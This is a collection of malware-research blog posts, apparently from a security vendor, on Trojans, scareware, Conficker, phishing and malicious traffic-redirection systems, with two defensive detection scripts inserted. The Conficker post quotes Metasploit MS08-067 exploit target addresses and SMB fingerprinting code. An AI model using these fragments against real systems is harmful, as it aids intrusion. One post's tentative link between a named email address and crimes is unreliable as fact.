    Before this we saw mostly lame malware for Mac OSX, but the iWork09 Trojan represents a new element to Mac Trojans — sophistication. This one contains peer to peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

    One thing to remember when dealing with pirated software is that you might have a high price to pay, in this case ending up with a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for “McAfee” on torrent sites, you will find a lot with serial numbers; but you won’t know whether the thing is a Trojan version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of Trojan versions of pirated Mac applications.

    Take care — you often get what you pay for. ;)

    The McAfee 2009 Threat Predictions

    Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

    Threats Hide in the Cloud
    Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

    Personalized Threats Speak Your Language
    Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

    Malware Targets Consumer Devices
    McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

    The Rogue Web and Malvertising
    Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

    McColo: The Effects of a Takedown
    Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

    Download the full report from our whitepaper page here.

    Fake antivirus and a real threat

    Fake alert malware preys on innocent victims by displaying misleading scan alerts. It tricks the user into buying fake antivirus to fix such falsely exaggerated scan reports. This class of “scareware” depends on extreme social engineering tactics and comes bundled with backdoors, password stealers, downloaders, droppers, browser helper objects, etc.

    Each of the above classes of malware is used either in the distribution of the fake antivirus itself or in the propagation of other kinds of malware once the fake antivirus is installed on the victim’s machine. Working towards a common goal – extorting money from an innocent victim – these scareware applications have added a new class of malware to their armory – rootkits.

    Apart from hiding the scareware’s files, rootkits ensure that access to genuine security vendors’ sites is disabled. The rootkit we noticed, named “tdss[random characters].sys” was blogged about by Computer Associates recently and was associated with the AntiSpywareXP2009 scareware. We, however, noticed that this rootkit was protecting rogue components belonging to WinWebSecurity scareware. This implies that:

    1. The same author of the rootkit is supplying his code to multiple scareware vendors for money, or
    2. The same group is creating and distributing multiple fake antivirus.

    McAfee AV will detect and clean this rootkit component from DAT version 5496 onwards. However, a user stuck with a machine that does not have antivirus with updated signatures will have to clean this rootkit manually.

    If you are a Windows user, apart from the usual safe computing practices that include using a firewall, an updated Windows operating system and an antivirus software, consider the following steps to minimize the chances of getting infected by such scareware:

    1. Install backup software that can revert your system to a previous known uninfected state
    2. Browse the Internet from sandbox software
    3. Install and browse the Internet from a Virtual Machine

    On a final note, the Federal Trade Commission has recently won a restraining order against Innovative Marketing and ByteHosting Internet Services – companies responsible for marketing the scareware applications WinFixer, WinAntivirus, DriveCleaner, ErrorSafe and XP Antivirus. However, we will have to wait to see if this move actually has any impact on curbing the distribution of scareware.

    Don’t worry, Obama did not refuse to be a president!

    In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

    Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

    Let me add that if you are lured into this trap and are using an inadequately protected PC, you will be infected by malware we detect as W32/Waledac.gen.b.

    This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

    Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

    Conficker Worm using Metasploit payload to spread

    Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm carries an exploit for the recent MS08-067 vulnerability and uses an exploitation method derived from the Metasploit ms08_067_netapi module to spread itself. Below is a snapshot of the packet capture of the traffic sent by the worm:

    As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated by Rex::Text.rand_text_alpha in ms08_067_netapi.rb. If we do a byte-order conversion of the data in the red box above, we get three addresses: 0x00020408, 0x6f8917c2, 0x6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from Metasploit):

    # Metasploit's NX bypass for XP SP2/SP3
    [ 'Windows XP SP3 English (NX)',
      {
        'Ret'       => 0x6f88f807,
        'DisableNX' => 0x6f8917c2,
        'Scratch'   => 0x00020408
      }
    ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

    The latest Metasploit exploit, besides covering the Windows XP/2003 OSs, also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek, Spanish, Finnish, French, Hebrew, Japanese, Chinese, etc. The ms08_067_netapi module also provides the “smb_fingerprint()” function to detect the Windows version, Service Pack and language of the target OS. This makes programming the worm much easier and can cause a much bigger impact. By using the exploit from the Metasploit module as the code base, a virus/worm programmer only needs to implement functions for automatic downloading and spreading. We believe this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting the OS version and Service Pack were embedded into this worm. Hence, without the remote OS language determination ‘feature’, this worm only targets the English OS versions at the time of writing.
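    The byte-order conversion described above is also the basis of a simple detection: the three target constants of that Metasploit entry are fixed, so a little-endian scan of a captured payload for those DWORDs identifies this exploit variant regardless of the random alphanumeric filler around them. The script below is an added example, not code from the post, Avert Labs or Metasploit: it embeds the three addresses quoted above, scans a constructed packet fragment at every byte offset, and reports a match only when at least two constants of the same target entry are present, which keeps a lone accidental DWORD from firing.

```python
import struct

# Added example (not from the post): scan a payload for the ms08_067_netapi target
# constants quoted in the text, converting little-endian DWORDs at every offset.

# The one target entry the post quotes; more entries could be added from the module.
KNOWN_TARGETS = {
    "Windows XP SP3 English (NX)": {
        "Ret": 0x6f88f807,
        "DisableNX": 0x6f8917c2,
        "Scratch": 0x00020408,
    },
}
# Reverse index: address -> (target name, role) for O(1) lookups while scanning.
ADDRESS_INDEX = {addr: (target, role)
                 for target, consts in KNOWN_TARGETS.items()
                 for role, addr in consts.items()}


def find_known_addresses(payload):
    """Return every offset at which a known target constant appears as a little-endian DWORD."""
    hits = []
    for offset in range(len(payload) - 3):
        value = struct.unpack_from("<I", payload, offset)[0]
        if value in ADDRESS_INDEX:
            target, role = ADDRESS_INDEX[value]
            hits.append({"offset": offset, "value": value, "target": target, "role": role})
    return hits


def classify(payload, min_hits=2):
    """Flag the payload when at least min_hits constants of one target entry occur."""
    hits = find_known_addresses(payload)
    per_target = {}
    for hit in hits:
        per_target[hit["target"]] = per_target.get(hit["target"], 0) + 1
    matched = [t for t, n in per_target.items() if n >= min_hits]
    return {"hits": hits, "matched_targets": matched, "match": bool(matched)}


# Constructed sample: alphabetic filler in the style of Rex::Text.rand_text_alpha with the
# three constants embedded in little-endian order, plus one unrelated DWORD (0x41414141).
SAMPLE_PAYLOAD = (b"AbCdEfGhIjKl"
                  + struct.pack("<I", 0x00020408)
                  + b"mNoP"
                  + struct.pack("<III", 0x6f8917c2, 0x6f88f807, 0x41414141)
                  + b"qRsT")

if __name__ == "__main__":
    verdict = classify(SAMPLE_PAYLOAD)
    for hit in verdict["hits"]:
        print("offset %2d: 0x%08x  %s / %s" % (hit["offset"], hit["value"], hit["target"], hit["role"]))
    print("match:", verdict["match"], verdict["matched_targets"])
```

    The same scan works on a raw .pcap payload slice; the only design choice worth noting is the minimum-hit threshold, since a single 32-bit value like 0x00020408 is low-entropy enough to appear by chance in unrelated traffic.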

    Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

    By sending an SMB session setup request, it can detect the OS information of the target machine. If the OS is Windows Server 2003, the Service Pack information is also returned.

    Since there are a huge number of Windows XP systems, it’s obvious that the worm writer did not want to miss out on this pool, which is why the worm determines the Service Pack level by accessing the \SRVSVC named pipe, similar to the method used in the Metasploit smb_fingerprint() function:

    if (os == 'Windows XP' and sp.length == 0)
        # SRVSVC was blocked in SP2
        begin
            smb_create("\\SRVSVC")
            sp = 'Service Pack 0 / 1'
        rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
            if (e.error_code == 0xc0000022)
                sp = 'Service Pack 2+'
            end
        end
    end

    So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

    For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our signature IDs 3961 and 0x40709d00 respectively. For VirusScan users, DAT version 5444 has coverage to detect this worm.

    McAfee Monthly Spam Report Debuts

    Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

    Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

    Political Spam
    Tax Relief Junk Mail
    Unemployment and Diploma Spam Increases
    Christmas E-Cards

    As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

    Rogue LinkedIn Profiles Lead To Malware

    LinkedIn is a popular social networking site where you can manage business contacts online. Since you can set up a profile with links to your own website, it seems to attract criminals’ attention as well. A Google search reveals that several hundred fake LinkedIn profiles from nude “Kirsten Dunst” to nude “Hulk Hogan” exist already. The rogue profiles look all alike, with a picture of the celebrity and three links to the parts of the “nude video” like shown in the following picture.

    This is exactly the lure – don’t follow these links! The linked websites contain obfuscated script code which decodes to a simple browser redirection. This obfuscated script code is proactively detected by McAfee as “Exploit-IFrame.gen.c” already.

    If you followed the link (don’t do that!) to see how deep the rabbit hole goes, you would end up at a Traffic Management System like the one described in this Avert Labs blog entry. On every reload the server-side application points to a different domain.

    So when an unsuspecting user is tricked into following the lure, he ends up on various malicious websites trying the classical social-engineering tricks: either the “missing video codec” or a fake AV scan telling the user his computer is infected with malware and offering a “free” AV scanner, which in fact is the real threat. So beware when following links, even on trusted Web 2.0 platforms like LinkedIn, especially when they promise nude celebrity videos.

    One Hacker May Conceal Another

    The current crisis in Gaza between Palestinians and Israelis marks a renewal of web defacement activities. Various Moroccan hacker groups have been pointed out by the press; the best known is “Team-Evil,” which just hacked the Ynet Israeli news site.

    This weekend, I read various French posts speaking about ethical hacking and “e-jihad” operations made by “pacifist hackers” motivated only by their political ideology. However, reality is sometimes different from perception, and one hacker may conceal another.

    On New Year’s Day various web sites were hacked by people introducing themselves as “Morocco & Gaza Hackers” or the “Team Cruel Boys” group.

    On the defaced page, one attacker–whose email address is m0x0m_at_hotmail.fr–introduced himself as “M. SoOoSo.” His message seems clear: “I’m not a saboteur, and I didn’t hack this site as an act of sabotage.” At first glance, this guy could gain some sympathizers of the Palestinians’ cause.

    But the story is not so simple. A week before, on Christmas Day, I heard about a phishing attack against Orange.fr, a French Internet Provider. Using a mirror site, hackers tried to intercept user names and passwords to access emails and personal data.

    Speaking with the discoverers of this identity theft attempt and looking at the code, I noted that the stolen data were sent to the same m0x0m email address. Moreover, the PHP script was named soooso.php. What a curious coincidence!

    A second email address pointed to another possible Moroccan. As a result of some searches I made today, I would not be surprised if this second guy (if he is not the same as the first) was also involved in some fake auction operations.

    Of course I can prove nothing, but it would not be the first time we have heard hackers claiming to be ethical “white hats” who are really engaged in criminal activities.

    Inside The Malicious Traffic Business

    The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or downloading and installing an executable which pretends to be the missing application needed to watch the movie. The animated picture below is such an example: at first glance, it looks like a typical embedded video which is unable to load. The “picture” states that you have to click on it in order to see the movie. And here the lure begins – in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

    In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

    The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates, and after too many retries you will always be redirected to the homepage of Google. The system remembers your IP address on the server side for a certain time period. After that time, or when you use another IP address, you will again see the redirections when visiting the URL.

    The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

    Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

    The administrator is able to define rules for “incoming traffic” which result in different “outgoing traffic” based on different restrictions. For example, Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country are redirected to a different location – just think of localized campaigns targeted to the language spoken in these countries. So users from the United States will not be redirected to a French phishing web site and vice versa.

    These traffic management systems can also use more complex rules based on network ranges and the Referer header – so let’s say that only visitors with a Referer from Google will be redirected to a malicious web site, as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

    Why do that? This way, only users searching for the website will get the malicious redirect, while the website’s owner or administrator, who usually does not search for it but enters the URL directly into the browser, will see the normal website with no oddities. This helps the attacker keep the infection under the radar for a longer time.
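    Because the rules key on the Referer and on the client’s network, a site owner who only ever types the URL directly will never see the redirect; the practical check is to fetch your own pages several times with a search-engine Referer from an outside connection and compare what comes back. The script below is an added example, not code from the post or from Avert Labs: it runs that comparison offline over constructed fetch records (each one the Referer sent, a label for the client network, the HTTP status and the Location header returned) and reports the three behaviours described above: redirects conditional on the Referer, rotating destinations with the fallback bounce to the search engine, and a clean page served only to clients from flagged ranges. The record format and the search-engine host list are my own assumptions.

```python
from urllib.parse import urlsplit

# Added example (not from the post): offline check for traffic-management-system
# cloaking, run over constructed fetch records of one URL.

# Constructed observations (not real traffic): the same URL fetched under different conditions.
OBSERVATIONS = [
    {"referer": "", "client": "site-owner", "status": 200, "location": None},
    {"referer": "https://www.google.com/search?q=example", "client": "residential",
     "status": 302, "location": "http://landing-one.example/"},
    {"referer": "https://www.google.com/search?q=example", "client": "residential",
     "status": 302, "location": "http://landing-two.example/"},
    {"referer": "https://www.google.com/search?q=example", "client": "residential",
     "status": 302, "location": "https://www.google.com/"},   # "too many retries" bounce
    {"referer": "https://www.google.com/search?q=example", "client": "security-vendor",
     "status": 200, "location": None},                          # flagged range gets the real page
]

# Assumed markers for search-engine referers.
SEARCH_ENGINE_MARKERS = ("google.", "bing.", "yahoo.")


def host_of(url):
    """Hostname of a URL, or '' when the URL is empty or missing."""
    if not url:
        return ""
    return urlsplit(url).hostname or ""


def from_search_engine(url):
    return any(marker in host_of(url) for marker in SEARCH_ENGINE_MARKERS)


def is_redirect(record):
    return record["status"] in (301, 302, 303, 307) and bool(record["location"])


def analyse(records):
    """Return a list of cloaking findings; an empty list means the fetches looked consistent."""
    search_redirects = [r for r in records if from_search_engine(r["referer"]) and is_redirect(r)]
    direct_redirects = [r for r in records if not r["referer"] and is_redirect(r)]
    # Destinations that bounce back to the search engine are the retry fallback, not landing pages.
    landing_hosts = {host_of(r["location"]) for r in search_redirects
                     if not from_search_engine(r["location"])}
    flagged_passthrough = [r for r in records
                           if r["client"] == "security-vendor"
                           and from_search_engine(r["referer"]) and not is_redirect(r)]
    findings = []
    if search_redirects and not direct_redirects:
        findings.append("referer-conditional: search-engine visitors are redirected, direct visitors are not")
    if len(landing_hosts) > 1:
        findings.append("rotating destinations: " + ", ".join(sorted(landing_hosts)))
    if search_redirects and flagged_passthrough:
        findings.append("network-conditional: clients from flagged ranges receive the normal page")
    return findings


if __name__ == "__main__":
    for finding in analyse(OBSERVATIONS) or ["no cloaking signs in these fetches"]:
        print(finding)
```

    Feeding it real records means collecting the status and Location of each fetch yourself (any HTTP client that does not auto-follow redirects will do); the analysis deliberately treats a bounce back to the search engine as the retry fallback described above rather than as a landing page.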

    Other traffic management systems, like the one shown in the picture above, also feature different logins to the web interface – for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic – that is, infected web sites containing an IFRAME that points to the traffic management system – and buyers of traffic – e.g. the people who run exploit servers and try to install malware on unpatched computers, and are thus looking for potential victims. Such traffic management systems sit between the infected web sites and the exploit servers. As you can see in the picture above, payment options can also be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, campaigns can easily be exchanged, or the “traffic” can be sold to new buyers who try to install their malware.

    So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious resource nowadays means that you are redirected by a complex server-side management system.